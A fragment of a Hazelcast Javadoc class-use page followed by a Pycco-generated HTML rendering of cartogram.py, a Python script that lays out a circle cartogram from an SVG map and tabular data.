href="../../../com/hazelcast/monitor/class-use/LocalExecutorStats.html#com.hazelcast.monitor">LocalExecutorStats</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalInstanceStats.html#com.hazelcast.monitor">LocalInstanceStats</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalMapStats.html#com.hazelcast.monitor">LocalMapStats</a> <div class="block">Local map statistics.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalMultiMapStats.html#com.hazelcast.monitor">LocalMultiMapStats</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalQueueStats.html#com.hazelcast.monitor">LocalQueueStats</a> <div class="block">Local queue statistics.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/LocalTopicStats.html#com.hazelcast.monitor">LocalTopicStats</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/MemberState.html#com.hazelcast.monitor">MemberState</a>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/NearCacheStats.html#com.hazelcast.monitor">NearCacheStats</a>&nbsp;</td> </tr> <tr class="altColor"> <td class="colOne"><a href="../../../com/hazelcast/monitor/class-use/TimedMemberState.html#com.hazelcast.monitor">TimedMemberState</a>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../index.html?com/hazelcast/monitor/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2014 <a href="http://www.hazelcast.com/">Hazelcast, Inc.</a>. All Rights Reserved.</small></p> </body> </html>
source/cartogram.html
shayzluf/lazoozweb
<!DOCTYPE html> <html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>cartogram.py</title> <link rel="stylesheet" href="pycco.css"> </head> <body> <div id="background"></div> <div id='container'> <div class='section'> <div class='docs'><h1>cartogram.py</h1></div> </div> <div class='clearall'> <div class='section' id='section-0'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-0'>#</a> </div> <p>computes a circle cartogram for a given svg map + data file</p> </div> <div class='code'> <div class="highlight"><pre></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-1'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-1'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-2'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-2'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre><span class="k">class</span> <span class="nc">Cartogram</span><span class="p">:</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-3'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-3'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">generate</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">svg_src</span><span class="p">,</span> <span class="n">attr</span><span class="p">,</span> <span class="n">csv_src</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="n">regions</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">load_regions_from_svg</span><span class="p">(</span><span class="n">svg_src</span><span class="p">,</span> <span class="n">attr</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">load_csv</span><span class="p">(</span><span class="n">csv_src</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">)</span> <span class="n">circles</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="nb">id</span> <span class="ow">in</span> <span class="n">regions</span><span class="p">:</span> <span class="n">cx</span><span class="p">,</span> <span class="n">cy</span> <span class="o">=</span> <span class="n">regions</span><span class="p">[</span><span class="nb">id</span><span class="p">]</span> <span class="n">val</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="nb">id</span><span class="p">]</span> <span class="n">circles</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">Circle</span><span class="p">(</span><span class="n">cx</span><span class="p">,</span> <span class="n">cy</span><span class="p">,</span> <span class="nb">id</span><span class="p">,</span> <span class="n">val</span><span class="p">))</span> <span class="bp">self</span><span class="o">.</span><span class="n">attr</span> <span class="o">=</span> <span class="n">attr</span> <span class="bp">self</span><span class="o">.</span><span class="n">key</span> <span class="o">=</span> <span class="n">value</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span> <span class="o">=</span> <span class="n">circles</span> <span class="bp">self</span><span class="o">.</span><span class="n">compute_radii</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">layout</span><span class="p">(</span><span class="mi">700</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">rescale</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">correct</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">layout</span><span class="p">(</span><span class="mi">200</span><span class="p">,</span> <span class="bp">True</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">rescale</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">correct</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">layout</span><span class="p">(</span><span class="mi">100</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">rescale</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">correct</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">to_svg</span><span class="p">()</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-4'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-4'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">load_regions_from_svg</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">url</span><span class="p">,</span> <span class="n">attr</span><span class="p">):</span> <span class="kn">import</span> <span class="nn">svg</span> <span class="kn">as</span> <span class="nn">svgdoc</span> <span class="n">svg</span> <span class="o">=</span> <span class="n">svgdoc</span><span class="o">.</span><span class="n">Document</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">svg</span> <span class="o">=</span> <span class="n">svg</span> <span class="n">g</span> <span class="o">=</span> <span class="n">svg</span><span class="o">.</span><span class="n">doc</span><span class="o">.</span><span class="n">getElementsByTagName</span><span class="p">(</span><span class="s">&#39;g&#39;</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="n">coords</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">for</span> <span class="n">path</span> <span class="ow">in</span> <span class="n">g</span><span class="o">.</span><span class="n">getElementsByTagName</span><span class="p">(</span><span class="s">&#39;path&#39;</span><span class="p">):</span> <span class="n">path_str</span> <span class="o">=</span> <span class="n">path</span><span class="o">.</span><span class="n">getAttribte</span><span class="p">(</span><span class="s">&#39;d&#39;</span><span class="p">)</span> <span class="nb">id</span> <span class="o">=</span> <span class="n">path</span><span class="o">.</span><span class="n">getAttribte</span><span class="p">(</span><span class="s">&#39;data-&#39;</span> <span class="o">+</span> <span class="n">attr</span><span class="p">)</span> <span class="n">poly</span> <span class="o">=</span> <span class="n">restore_poly_from_path_str</span><span class="p">(</span><span class="n">path_str</span><span class="p">)</span> <span class="n">coords</span><span class="p">[</span><span class="nb">id</span><span class="p">]</span> <span class="o">=</span> <span class="n">poly</span><span class="o">.</span><span class="n">center</span><span class="p">()</span> <span class="k">return</span> <span class="n">coords</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-5'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-5'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">load_csv</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">url</span><span class="p">,</span> <span class="n">key</span><span class="o">=</span><span class="s">&#39;id&#39;</span><span class="p">,</span> <span class="n">value</span><span class="o">=</span><span class="s">&#39;val&#39;</span><span class="p">):</span> <span class="kn">import</span> <span class="nn">csv</span> <span class="n">doc</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">reader</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="n">url</span><span class="p">),</span> <span class="n">dialect</span><span class="o">=</span><span class="s">&#39;excel-tab&#39;</span><span class="p">)</span> <span class="n">head</span> <span class="o">=</span> <span class="bp">None</span> <span class="n">data</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">doc</span><span class="p">:</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">head</span><span class="p">:</span> <span class="n">head</span> <span class="o">=</span> <span class="n">row</span> <span class="k">print</span> <span class="n">head</span> <span class="k">else</span><span class="p">:</span> <span class="nb">id</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="n">head</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">key</span><span class="p">)]</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="n">val</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="n">head</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">value</span><span class="p">)])</span> <span class="n">data</span><span class="p">[</span><span class="nb">id</span><span class="p">]</span> <span class="o">=</span> <span class="n">val</span> <span class="k">return</span> <span class="n">data</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-6'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-6'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">compute_radii</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="kn">import</span> <span class="nn">sys</span><span class="o">,</span> <span class="nn">math</span> <span class="n">minv</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">maxv</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">maxint</span> <span class="o">*</span> <span class="o">-</span><span class="mi">1</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">minv</span> <span class="o">=</span> <span class="nb">min</span><span class="p">(</span><span class="n">minv</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">value</span><span class="p">)</span> <span class="n">maxv</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span><span class="n">maxv</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">value</span><span class="p">)</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">c</span><span class="o">.</span><span class="n">r</span> <span class="o">=</span> <span class="n">math</span><span class="o">.</span><span class="n">pow</span><span class="p">((</span><span class="n">c</span><span class="o">.</span><span class="n">value</span> <span class="o">-</span> <span class="n">minv</span><span class="p">)</span> <span class="o">/</span> <span class="p">(</span><span class="n">maxv</span> <span class="o">-</span> <span class="n">minv</span><span class="p">),</span> <span class="mf">0.50</span><span class="p">)</span> <span class="o">*</span> <span class="mi">60</span> <span class="n">c</span><span class="o">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">value</span> <span class="o">/</span> <span class="n">maxv</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-7'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-7'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">layout</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">steps</span><span class="o">=</span><span class="mi">100</span><span class="p">,</span> <span class="n">correct</span><span class="o">=</span><span class="bp">False</span><span class="p">):</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">steps</span><span class="p">):</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-8'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-8'>#</a> </div> <p>if i % 100 == 0: self.toSVG()</p> </div> <div class='code'> <div class="highlight"><pre> <span class="bp">self</span><span class="o">.</span><span class="n">layout_step</span><span class="p">(</span><span class="n">correct</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-9'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-9'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">layout_step</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">correct</span><span class="o">=</span><span class="bp">False</span><span class="p">):</span> <span class="kn">import</span> <span class="nn">math</span> <span class="n">pad</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">if</span> <span class="n">correct</span><span class="p">:</span> <span class="k">for</span> <span class="n">C</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">v</span> <span class="o">=</span> <span class="n">Vector</span><span class="p">(</span><span class="n">C</span><span class="o">.</span><span class="n">ox</span> <span class="o">-</span> <span class="n">C</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">C</span><span class="o">.</span><span class="n">oy</span> <span class="o">-</span> <span class="n">C</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="n">v</span><span class="o">.</span><span class="n">normalize</span><span class="p">()</span> <span class="n">v</span><span class="o">.</span><span class="n">resize</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span> <span class="n">C</span><span class="o">.</span><span class="n">_move</span><span class="p">(</span><span class="n">v</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">v</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="k">for</span> <span class="n">A</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="k">for</span> <span class="n">B</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="k">if</span> <span class="n">A</span> <span class="o">!=</span> <span class="n">B</span><span class="p">:</span> <span class="n">radsq</span> <span class="o">=</span> <span class="p">(</span><span class="n">A</span><span class="o">.</span><span class="n">r</span> <span class="o">+</span> <span class="n">B</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">A</span><span class="o">.</span><span class="n">r</span> <span class="o">+</span> <span class="n">B</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="n">d</span> <span class="o">=</span> <span class="n">A</span><span class="o">.</span><span class="n">sqdist</span><span class="p">(</span><span class="n">B</span><span class="p">)</span> <span class="k">if</span> <span class="n">radsq</span> <span class="o">+</span> <span class="n">pad</span> <span class="o">&gt;</span> <span class="n">d</span><span class="p">:</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-10'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-10'>#</a> </div> <p>move circles away from each other</p> </div> <div class='code'> <div class="highlight"><pre> <span class="n">v</span> <span class="o">=</span> <span class="n">Vector</span><span class="p">(</span><span class="n">B</span><span class="o">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">A</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">B</span><span class="o">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">A</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="n">v</span><span class="o">.</span><span class="n">normalize</span><span class="p">()</span> <span class="n">m</span> <span class="o">=</span> <span class="p">(</span><span class="n">math</span><span class="o">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">radsq</span><span class="p">)</span> <span class="o">-</span> <span class="n">math</span><span class="o">.</span><span class="n">sqrt</span><span class="p">(</span><span class="n">d</span><span class="p">))</span> <span class="o">*</span> <span class="mf">0.25</span> <span class="n">v</span><span class="o">.</span><span class="n">resize</span><span class="p">(</span><span class="n">m</span><span class="p">)</span> <span class="n">A</span><span class="o">.</span><span class="n">_move</span><span class="p">(</span><span class="n">v</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="n">B</span><span class="o">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">v</span><span class="o">.</span><span class="n">y</span> <span class="o">*</span> <span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="n">B</span><span class="o">.</span><span class="n">weight</span><span class="p">)</span> <span class="n">B</span><span class="o">.</span><span class="n">_move</span><span class="p">(</span><span class="n">v</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="n">A</span><span class="o">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">v</span><span class="o">.</span><span class="n">y</span> <span class="o">*</span> <span class="n">A</span><span class="o">.</span><span class="n">weight</span><span class="p">)</span> <span class="k">for</span> <span class="n">C</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">C</span><span class="o">.</span><span class="n">move</span><span class="p">()</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-11'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-11'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">rescale</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">geometry</span> <span class="kn">import</span> <span class="n">BBox</span><span class="p">,</span> <span class="n">View</span> <span class="n">svg</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">svg</span> <span class="n">svg_view</span> <span class="o">=</span> <span class="n">svg</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="n">vh</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">svg_view</span><span class="p">[</span><span class="s">&#39;h&#39;</span><span class="p">])</span> <span class="n">vw</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">svg_view</span><span class="p">[</span><span class="s">&#39;w&#39;</span><span class="p">])</span> <span class="n">bbox</span> <span class="o">=</span> <span class="n">BBox</span><span class="p">()</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">r</span> <span class="o">=</span> <span class="n">c</span><span class="o">.</span><span class="n">r</span> <span class="n">bbox</span><span class="o">.</span><span class="n">update</span><span class="p">((</span><span class="n">c</span><span class="o">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">r</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">r</span><span class="p">))</span> <span class="n">bbox</span><span class="o">.</span><span class="n">update</span><span class="p">((</span><span class="n">c</span><span class="o">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">r</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">r</span><span class="p">))</span> <span class="n">bbox</span><span class="o">.</span><span class="n">update</span><span class="p">((</span><span class="n">c</span><span class="o">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">r</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">r</span><span class="p">))</span> <span class="n">bbox</span><span class="o">.</span><span class="n">update</span><span class="p">((</span><span class="n">c</span><span class="o">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">r</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">r</span><span class="p">))</span> <span class="n">view</span> <span class="o">=</span> <span class="n">View</span><span class="p">(</span><span class="n">bbox</span><span class="p">,</span> <span class="n">vw</span><span class="p">,</span> <span class="n">vh</span><span class="p">)</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">c</span><span class="o">.</span><span class="n">r</span> <span class="o">*=</span> <span class="n">view</span><span class="o">.</span><span class="n">scale</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="n">view</span><span class="o">.</span><span class="n">project</span><span class="p">((</span><span class="n">c</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">y</span><span class="p">))</span> <span class="n">c</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">x</span> <span class="n">c</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="n">y</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-12'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-12'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">correct</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">for</span> <span class="n">A</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">intersects</span> <span class="o">=</span> <span class="bp">False</span> <span class="k">for</span> <span class="n">B</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="k">if</span> <span class="n">A</span> <span class="o">!=</span> <span class="n">B</span><span class="p">:</span> <span class="n">radsq</span> <span class="o">=</span> <span class="p">(</span><span class="n">A</span><span class="o">.</span><span class="n">r</span> <span class="o">+</span> <span class="n">B</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">A</span><span class="o">.</span><span class="n">r</span> <span class="o">+</span> <span class="n">B</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="n">d</span> <span class="o">=</span> <span class="n">A</span><span class="o">.</span><span class="n">sqdist_o</span><span class="p">(</span><span class="n">B</span><span class="p">)</span> <span class="k">if</span> <span class="n">radsq</span> <span class="o">&gt;</span> <span class="n">d</span><span class="p">:</span> <span class="n">intersects</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">break</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">intersects</span><span class="p">:</span> <span class="n">A</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="n">A</span><span class="o">.</span><span class="n">ox</span> <span class="n">A</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="n">A</span><span class="o">.</span><span class="n">oy</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-13'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-13'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">to_svg</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="n">svg</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">svg</span> <span class="n">g</span> <span class="o">=</span> <span class="n">svg</span><span class="o">.</span><span class="n">node</span><span class="p">(</span><span class="s">&#39;g&#39;</span><span class="p">,</span> <span class="n">svg</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="s">&quot;cartogram&quot;</span><span class="p">,</span> <span class="n">fill</span><span class="o">=</span><span class="s">&quot;red&quot;</span><span class="p">,</span> <span class="n">fill_opacity</span><span class="o">=</span><span class="s">&quot;0.5&quot;</span><span class="p">)</span> <span class="k">for</span> <span class="n">circle</span> <span class="ow">in</span> <span class="bp">self</span><span class="o">.</span><span class="n">circles</span><span class="p">:</span> <span class="n">c</span> <span class="o">=</span> <span class="n">svg</span><span class="o">.</span><span class="n">node</span><span class="p">(</span><span class="s">&#39;circle&#39;</span><span class="p">,</span> <span class="n">g</span><span class="p">,</span> <span class="n">cx</span><span class="o">=</span><span class="n">circle</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="n">cy</span><span class="o">=</span><span class="n">circle</span><span class="o">.</span><span class="n">y</span><span class="p">,</span> <span class="n">r</span><span class="o">=</span><span class="n">circle</span><span class="o">.</span><span class="n">r</span><span class="p">)</span> <span class="n">c</span><span class="o">.</span><span class="n">setAttribute</span><span class="p">(</span><span class="s">&#39;data-&#39;</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">attr</span><span class="p">,</span> <span class="n">circle</span><span class="o">.</span><span class="n">id</span><span class="p">)</span> <span class="n">c</span><span class="o">.</span><span class="n">setAttribute</span><span class="p">(</span><span class="s">&#39;data-&#39;</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">key</span><span class="o">.</span><span class="n">lower</span><span class="p">(),</span> <span class="n">circle</span><span class="o">.</span><span class="n">value</span><span class="p">)</span> <span class="n">g</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="n">svg</span><span class="o">.</span><span class="n">preview</span><span class="p">()</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-14'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-14'>#</a> </div> <p>svg.save('cartogram.svg')</p> </div> <div class='code'> <div class="highlight"><pre></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-15'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-15'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre><span class="k">class</span> <span class="nc">Circle</span><span class="p">:</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-16'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-16'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">,</span> <span class="nb">id</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">ox</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">oy</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">y</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">id</span> <span class="o">=</span> <span class="nb">id</span> <span class="bp">self</span><span class="o">.</span><span class="n">value</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">value</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">dx</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="o">.</span><span class="n">dy</span> <span class="o">=</span> <span class="mi">0</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-17'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-17'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">_move</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">dx</span> <span class="o">+=</span> <span class="n">x</span> <span class="bp">self</span><span class="o">.</span><span class="n">dy</span> <span class="o">+=</span> <span class="n">y</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-18'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-18'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">move</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dx</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">+=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dy</span> <span class="bp">self</span><span class="o">.</span><span class="n">dx</span> <span class="o">=</span> <span class="mi">0</span> <span class="bp">self</span><span class="o">.</span><span class="n">dy</span> <span class="o">=</span> <span class="mi">0</span></pre></div> </div> </div> <div class='clearall'></div> <div 